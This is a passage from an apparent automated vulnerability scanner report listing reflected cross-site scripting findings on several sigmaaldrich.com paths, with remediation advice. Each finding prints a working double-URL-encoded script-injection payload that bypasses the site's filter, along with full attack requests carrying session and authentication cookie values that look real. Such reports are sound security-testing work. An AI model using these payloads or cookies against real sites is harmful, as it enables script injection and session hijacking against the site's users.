Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/site-level/corporate/1861e";alert(1)//a042e9096a8","E404") ;
   </script>
...[SNIP]...

1.634. http://www.sigmaaldrich.com/site-level/mobile.html [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /site-level/mobile.html

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9d9d4%2522%253balert%25281%2529%252f%252f74a37f61ea7 was submitted in the REST URL parameter 1. This input was echoed as 9d9d4";alert(1)//74a37f61ea7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /site-level9d9d4%2522%253balert%25281%2529%252f%252f74a37f61ea7/mobile.html HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:06:56 GMT
Content-Length: 28926
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/site-level9d9d4";alert(1)//74a37f61ea7/mobile.html","E404") ;
   </script>
...[SNIP]...

1.635. http://www.sigmaaldrich.com/site-level/mobile.html [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /site-level/mobile.html

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b7404%2522%253balert%25281%2529%252f%252fc8a0e85a4c1 was submitted in the REST URL parameter 2. This input was echoed as b7404";alert(1)//c8a0e85a4c1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /site-level/b7404%2522%253balert%25281%2529%252f%252fc8a0e85a4c1 HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:06:58 GMT
Content-Length: 28915
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/site-level/b7404";alert(1)//c8a0e85a4c1","E404") ;
   </script>
...[SNIP]...

1.636. http://www.sigmaaldrich.com/technical-service-home/product-catalog.flagdisplay.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /technical-service-home/product-catalog.flagdisplay.js

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 48d6b%2522%253balert%25281%2529%252f%252f9ec1da5ca1b was submitted in the REST URL parameter 1. This input was echoed as 48d6b";alert(1)//9ec1da5ca1b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /technical-service-home48d6b%2522%253balert%25281%2529%252f%252f9ec1da5ca1b/product-catalog.flagdisplay.js?id=1289930010680 HTTP/1.1
Accept: */*
Referer: http://www.sigmaaldrich.com/technical-service-home/product-catalog.html
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: www.sigmaaldrich.com
Proxy-Connection: Keep-Alive
Cookie: cmTPSet=Y; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; SialLocaleDef=CountryCode~US|WebLang~-1|; country=USA; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"Unknown","MemberId":"Unknown","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":3,"to":2.8,"c":"http://www.sigmaaldrich.com/catalog/Lookup.do","lc":{"d0":{"v":3,"s":false}},"cd":0,"sd":0,"f":1289930591682}; bn_u=6923287736776754713; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcatalog%2FLookup.do%3FD7%3D0%26N17%3D2%26N16%3DAND(OR(CONTEXT%3A1%2CCONTEXT%3A3)%2COR(LOCATION%3AUS%2CLOCATION%3A0))%26N3%3Dmode%20matchpartialmax%26N5%3DMolecular%20Formula%26N4%3D%60%26N1%3DS_ID%26ST%3DRS%26QS%3DON%26N25%3D0%26F%3DTD%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcatalog%2FLookup.do%3FN5%3DAll%26N3%3Dmode%2Bmatchpartialmax%26N4%3D%2560%26D7%3D0%26D10%3D%2560%26N1%3DS_ID%26ST%3DRS%26N25%3D0%26F%3DPR%22%2C%22t%22%3A1289930591511%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22l%22%3A%22Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Search%20Results%22%2C%22nw%22%3A784%2C%22nl%22%3A92%7D%7D; fsr.a=1289930591838

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:05:09 GMT
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/
Content-Length: 28957


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/technical-service-home48d6b";alert(1)//9ec1da5ca1b/product-catalog.flagdisplay.js","E404") ;
   </script>
...[SNIP]...

1.637. http://www.sigmaaldrich.com/technical-service-home/product-catalog.flagdisplay.js [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /technical-service-home/product-catalog.flagdisplay.js

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c51cf%2522%253balert%25281%2529%252f%252f43420a37288 was submitted in the REST URL parameter 2. This input was echoed as c51cf";alert(1)//43420a37288 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /technical-service-home/c51cf%2522%253balert%25281%2529%252f%252f43420a37288?id=1289930010680 HTTP/1.1
Accept: */*
Referer: http://www.sigmaaldrich.com/technical-service-home/product-catalog.html
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: www.sigmaaldrich.com
Proxy-Connection: Keep-Alive
Cookie: cmTPSet=Y; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; SialLocaleDef=CountryCode~US|WebLang~-1|; country=USA; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"Unknown","MemberId":"Unknown","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":3,"to":2.8,"c":"http://www.sigmaaldrich.com/catalog/Lookup.do","lc":{"d0":{"v":3,"s":false}},"cd":0,"sd":0,"f":1289930591682}; bn_u=6923287736776754713; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcatalog%2FLookup.do%3FD7%3D0%26N17%3D2%26N16%3DAND(OR(CONTEXT%3A1%2CCONTEXT%3A3)%2COR(LOCATION%3AUS%2CLOCATION%3A0))%26N3%3Dmode%20matchpartialmax%26N5%3DMolecular%20Formula%26N4%3D%60%26N1%3DS_ID%26ST%3DRS%26QS%3DON%26N25%3D0%26F%3DTD%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcatalog%2FLookup.do%3FN5%3DAll%26N3%3Dmode%2Bmatchpartialmax%26N4%3D%2560%26D7%3D0%26D10%3D%2560%26N1%3DS_ID%26ST%3DRS%26N25%3D0%26F%3DPR%22%2C%22t%22%3A1289930591511%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22l%22%3A%22Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Search%20Results%22%2C%22nw%22%3A784%2C%22nl%22%3A92%7D%7D; fsr.a=1289930591838

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:05:11 GMT
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/
Content-Length: 28927


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/technical-service-home/c51cf";alert(1)//43420a37288","E404") ;
   </script>
...[SNIP]...

1.638. http://www.sigmaaldrich.com/technical-service-home/product-catalog.html [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /technical-service-home/product-catalog.html

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8e0a4%2522%253balert%25281%2529%252f%252ff5e71599d09 was submitted in the REST URL parameter 1. This input was echoed as 8e0a4";alert(1)//f5e71599d09 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /technical-service-home8e0a4%2522%253balert%25281%2529%252f%252ff5e71599d09/product-catalog.html HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://www.sigmaaldrich.com/catalog/Lookup.do?D7=0&N17=2&N16=AND(OR(CONTEXT:1,CONTEXT:3),OR(LOCATION:US,LOCATION:0))&N3=mode matchpartialmax&N5=Molecular Formula&N4=`&N1=S_ID&ST=RS&QS=ON&N25=0&F=TD
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: www.sigmaaldrich.com
Proxy-Connection: Keep-Alive
Cookie: cmTPSet=Y; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; SialLocaleDef=CountryCode~US|WebLang~-1|; country=USA; cmRS=&t1=1289930590653&t2=1289930590965&t3=1289930591495&t4=1289930590231&lti=1289930591495&ln=&hr=/technical-service-home/product-catalog.html&fti=&fn=SearchForm%3A0%3BtestLookahead%3A1%3BsearchResultsSearch%3A2%3BDocument%20Category%3A3%3B&ac=&fd=&uer=&fu=&pi=Search%20Result%20Page&ho=cm.sigmaaldrich.com/eluminate%3F&ci=90142934; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"Unknown","MemberId":"Unknown","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":3,"to":2.8,"c":"http://www.sigmaaldrich.com/catalog/Lookup.do","lc":{"d0":{"v":3,"s":false}},"cd":0,"sd":0,"f":1289930590247}; bn_u=6923287736776754713; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcatalog%2FLookup.do%3FD7%3D0%26N17%3D2%26N16%3DAND(OR(CONTEXT%3A1%2CCONTEXT%3A3)%2COR(LOCATION%3AUS%2CLOCATION%3A0))%26N3%3Dmode%20matchpartialmax%26N5%3DMolecular%20Formula%26N4%3D%60%26N1%3DS_ID%26ST%3DRS%26QS%3DON%26N25%3D0%26F%3DTD%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcatalog%2FLookup.do%3FN5%3DAll%26N3%3Dmode%2Bmatchpartialmax%26N4%3D%2560%26D7%3D0%26D10%3D%2560%26N1%3DS_ID%26ST%3DRS%26N25%3D0%26F%3DPR%22%2C%22t%22%3A1289930591511%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22l%22%3A%22Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Search%20Results%22%2C%22nw%22%3A784%2C%22nl%22%3A92%7D%7D

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:05:08 GMT
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/
Content-Length: 28947


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/technical-service-home8e0a4";alert(1)//f5e71599d09/product-catalog.html","E404") ;
   </script>
...[SNIP]...

1.639. http://www.sigmaaldrich.com/technical-service-home/product-catalog.html [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /technical-service-home/product-catalog.html

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 86339%2522%253balert%25281%2529%252f%252fd6e5fce1c43 was submitted in the REST URL parameter 2. This input was echoed as 86339";alert(1)//d6e5fce1c43 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /technical-service-home/86339%2522%253balert%25281%2529%252f%252fd6e5fce1c43 HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://www.sigmaaldrich.com/catalog/Lookup.do?D7=0&N17=2&N16=AND(OR(CONTEXT:1,CONTEXT:3),OR(LOCATION:US,LOCATION:0))&N3=mode matchpartialmax&N5=Molecular Formula&N4=`&N1=S_ID&ST=RS&QS=ON&N25=0&F=TD
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: www.sigmaaldrich.com
Proxy-Connection: Keep-Alive
Cookie: cmTPSet=Y; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; SialLocaleDef=CountryCode~US|WebLang~-1|; country=USA; cmRS=&t1=1289930590653&t2=1289930590965&t3=1289930591495&t4=1289930590231&lti=1289930591495&ln=&hr=/technical-service-home/product-catalog.html&fti=&fn=SearchForm%3A0%3BtestLookahead%3A1%3BsearchResultsSearch%3A2%3BDocument%20Category%3A3%3B&ac=&fd=&uer=&fu=&pi=Search%20Result%20Page&ho=cm.sigmaaldrich.com/eluminate%3F&ci=90142934; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"Unknown","MemberId":"Unknown","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":3,"to":2.8,"c":"http://www.sigmaaldrich.com/catalog/Lookup.do","lc":{"d0":{"v":3,"s":false}},"cd":0,"sd":0,"f":1289930590247}; bn_u=6923287736776754713; 